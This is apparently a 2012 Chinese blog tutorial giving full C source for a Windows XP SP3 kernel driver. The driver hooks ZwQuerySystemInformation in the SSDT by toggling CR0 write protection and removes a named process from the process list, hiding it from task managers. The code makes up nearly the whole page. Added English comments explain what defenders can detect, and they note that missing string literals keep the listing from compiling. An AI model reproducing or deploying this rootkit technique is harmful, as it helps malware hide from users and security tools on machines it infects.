Rootkit进程篇之进程隐藏 ( SSDT Hook QuerySystemInformation )

标题: Rootkit进程篇之进程隐藏 QuerySystemInformation  作者: Y4ng  时间: 2012-07-11 18:30:26 星期三  链接:

rootkit 系列课程在断断续续地学习着,到今天也算一个小阶段,因为驱动算是入门了;之前看张帆老师的《Windows驱动开发技术详解》感觉讲得太基础了,不太适合我这种急性子的人学,草草看完,事后和没看一样。。。

个人觉得毛德操的《windows内核情景分析》搭配网络上高手的文章来学比较适合我这种不按正规路线走的人;

下面是我学习rootkit系列之进程篇的一个小章节,记录下来,一来可以备忘,二来可以帮助后来的初学者;

以下代码适用于:windows xp sp3

#include <ntddk.h>

/*
 * Reference listing (from a 2012 tutorial that, per the text above, targets
 * 32-bit Windows XP SP3) of a kernel driver that overwrites the SSDT slot of
 * ZwQuerySystemInformation and unlinks one process record from the list the
 * call returns.  The comments below describe what the code actually does and
 * what a defender can observe; the code itself is left exactly as published.
 *
 * NOTE(review): two string literals appear to have been lost when the page was
 * extracted (the second argument of RtlInitUnicodeString and the argument of
 * DbgPrint), so the listing as shown does not compile.
 */

/////////////////// Local structure definitions //////////////////////////////

/*
 * Undocumented per-thread record that follows each process record in the
 * SystemInformation buffer.  These layouts are build-specific; the page gives
 * them for XP SP3 only — confirm against the target build before relying on
 * any field offset.
 */
struct _SYSTEM_THREADS {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientIs;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    ULONG ThreadState;
    KWAIT_REASON WaitReason;
};

/*
 * Undocumented per-process record.  NextEntryDelta is the byte offset from
 * this record to the next one (the hook walks the list with it, see below);
 * a value of 0 marks the last record.
 */
typedef struct _SYSTEM_PROCESSES {
    ULONG NextEntryDelta;
    ULONG ThreadCount;
    ULONG Reserved[6];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ProcessName;
    KPRIORITY BasePriority;
    ULONG ProcessId;
    ULONG InheritedFromProcessId;
    ULONG HandleCount;
    ULONG Reserved2[2];
    VM_COUNTERS VmCounters;
    IO_COUNTERS IoCounters;
    struct _SYSTEM_THREADS Threads[1];
} *PSYSTEM_PROCESS, SYSTEM_PROCESS;

/* Signature of the original service routine, used to call through to it. */
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(IN ULONG SystemInformationClass,
                                              IN PVOID SystemInformation,
                                              IN ULONG SystemInformationLength,
                                              OUT PULONG ReturnLength);

///////////////// Service descriptor table layout of ntoskrnl.exe ////////////

/* Declared but not referenced by the code below. */
typedef struct _ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;

/*
 * The layout actually used for KeServiceDescriptorTable.  ServiceTableBase is
 * treated below as an array of 4-byte routine addresses (index * 4), which is
 * only correct for a 32-bit kernel.
 */
typedef struct _KESSDT {
    PVOID ServiceTableBase;
    PVOID ServiceCounterTableBase;
    unsigned int NumberOfService;
    PVOID ParamTableBase;
} ServiceDescriptorEntry, *PServiceDescriptorEntry;

/* Exported by the 32-bit kernel; not exported on 64-bit Windows, where Kernel
 * Patch Protection also covers the SSDT and CR0. */
__declspec (dllimport) ServiceDescriptorEntry KeServiceDescriptorTable;

/* SSDT index of ZwQuerySystemInformation — hard-coded for the build the page
 * names (XP SP3); indices differ between Windows versions. */
#define QUERYSYSTEMINFORMATIONID 0xAD
/* Information class whose result holds the process/thread list. */
#define SystemProcessAndThreadsInformation 5

// Variable definitions
/* Original slot value, captured in DriverEntry; the only copy Unload has to
 * restore from. */
ZWQUERYSYSTEMINFORMATION OldQuerySystemInformation;

/**
 * Replacement service routine installed in the SSDT.
 *
 * Calls the original routine first and only post-processes a successful
 * result for information class 5; every other class is passed through
 * untouched.  In the class-5 buffer it walks the records by NextEntryDelta
 * and, at the first record whose ProcessName equals the (here missing) name,
 * adds that record's delta to its predecessor's so later walkers skip over it.
 *
 * What a defender can observe: only the predecessor's delta is changed — the
 * skipped record's bytes remain in the caller's buffer and *ReturnLength is
 * not reduced, so a consumer that scans the buffer by size instead of by
 * delta, or that compares this view with another enumeration source, still
 * sees the record.  The SSDT slot itself now points into this driver's image
 * rather than into ntoskrnl, which is what SSDT integrity checks look for.
 *
 * @return The status of the original call; STATUS_UNSUCCESSFUL if the
 *         original pointer was never captured.
 */
NTSTATUS MyZwQuerySystemInformation(IN ULONG SystemInformationClass,
                                    IN OUT PVOID SystemInformation,
                                    IN ULONG SystemInformationLength,
                                    OUT PULONG ReturnLength)
{
    PSYSTEM_PROCESS systemprocess;
    PSYSTEM_PROCESS prev;
    NTSTATUS status;
    UNICODE_STRING uprocessname;

    if (NULL == OldQuerySystemInformation)
    {
        return STATUS_UNSUCCESSFUL;
    }

    /* Let the real routine fill the buffer before looking at it. */
    status = OldQuerySystemInformation(SystemInformationClass,
                                       SystemInformation, SystemInformationLength, ReturnLength);
    if (!NT_SUCCESS(status))
    {
        return status;
    }
    if (SystemProcessAndThreadsInformation != SystemInformationClass)
    {
        return status;
    }

    /* NOTE(review): the string literal (the process name to match) was lost
     * in page extraction; `L` alone is not valid here. */
    RtlInitUnicodeString(&uprocessname, L);

    systemprocess = (PSYSTEM_PROCESS)SystemInformation;
    prev = systemprocess;
    /* A zero delta marks the last record and ends the walk. */
    while (systemprocess->NextEntryDelta)
    {
        /* TRUE = case-insensitive comparison. */
        if (RtlEqualUnicodeString(&systemprocess->ProcessName, &uprocessname, TRUE))
        {
            //prev->NextEntryDelta = systemprocess + systemprocess->NextEntryDelta;
            /* Unlink: make the predecessor's delta span this record too.  The
             * record's bytes are not cleared and ReturnLength is unchanged. */
            prev->NextEntryDelta = prev->NextEntryDelta + systemprocess->NextEntryDelta;
            /* NOTE(review): format string lost in extraction; DbgPrint needs
             * at least one argument.  Any kernel debug output is itself a
             * visible trace of the hook firing. */
            DbgPrint();
            break;
        }
        prev = systemprocess;
        systemprocess = (PSYSTEM_PROCESS)((char*)systemprocess + systemprocess->NextEntryDelta);
    }
    return status;
}

/**
 * Driver unload routine: writes the saved original pointer back into the
 * SSDT slot.
 *
 * Clears CR0.WP (bit 16) so the read-only table page can be written, then
 * sets it again.  cli/sti only mask interrupts on the executing processor, so
 * on an SMP machine another CPU can observe the WP-disabled window or a call
 * already dispatched through the hook; no provision for in-flight calls is
 * visible here.
 *
 * NOTE(review): DRIVER_UNLOAD routines are declared VOID; a function returning
 * NTSTATUS assigned to DriverUnload will likely draw a compiler warning.
 */
NTSTATUS Unload(PDRIVER_OBJECT DriverObject)
{
    /* Address of the 4-byte SSDT slot for this service index (32-bit only). */
    ULONG address = (ULONG)((char*)KeServiceDescriptorTable.ServiceTableBase + QUERYSYSTEMINFORMATIONID * 4);
    __asm
    {
        cli
        mov eax, cr0
        and eax, not 0x10000
        mov cr0, eax
    }
    *((ULONG*)address) = (ULONG)OldQuerySystemInformation;
    __asm
    {
        mov eax, cr0
        or eax, 0x10000
        mov cr0, eax
        sti
    }
    return STATUS_SUCCESS;
}

/**
 * Driver entry point: captures the current SSDT slot value into
 * OldQuerySystemInformation, overwrites the slot with MyZwQuerySystemInformation
 * using the same CR0.WP toggle as Unload, and registers Unload.
 *
 * After this runs the slot holds an address inside this driver's image — the
 * discrepancy an SSDT integrity check (slot address vs. ntoskrnl image range)
 * reports.  RegistryPath is unused.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    ULONG address = (ULONG)((char*)KeServiceDescriptorTable.ServiceTableBase + QUERYSYSTEMINFORMATIONID * 4);
    /* Save the original so Unload can restore it. */
    OldQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)*((ULONG*)address);
    __asm
    {
        cli
        mov eax, cr0
        and eax, not 0x10000
        mov cr0, eax
    }
    /* NOTE(review): casts to (ULONG*) here but to (ULONG) in Unload; the
     * lvalue is a ULONG, so this likely warns about a pointer/integer mismatch. */
    *((ULONG*)address) = (ULONG*)MyZwQuerySystemInformation;
    __asm
    {
        mov eax, cr0
        or eax, 0x10000
        mov cr0, eax
        sti
    }
    DriverObject->DriverUnload = Unload;
    return STATUS_SUCCESS;
}
放弃那些不愿放弃的,容忍那些不可容忍的。
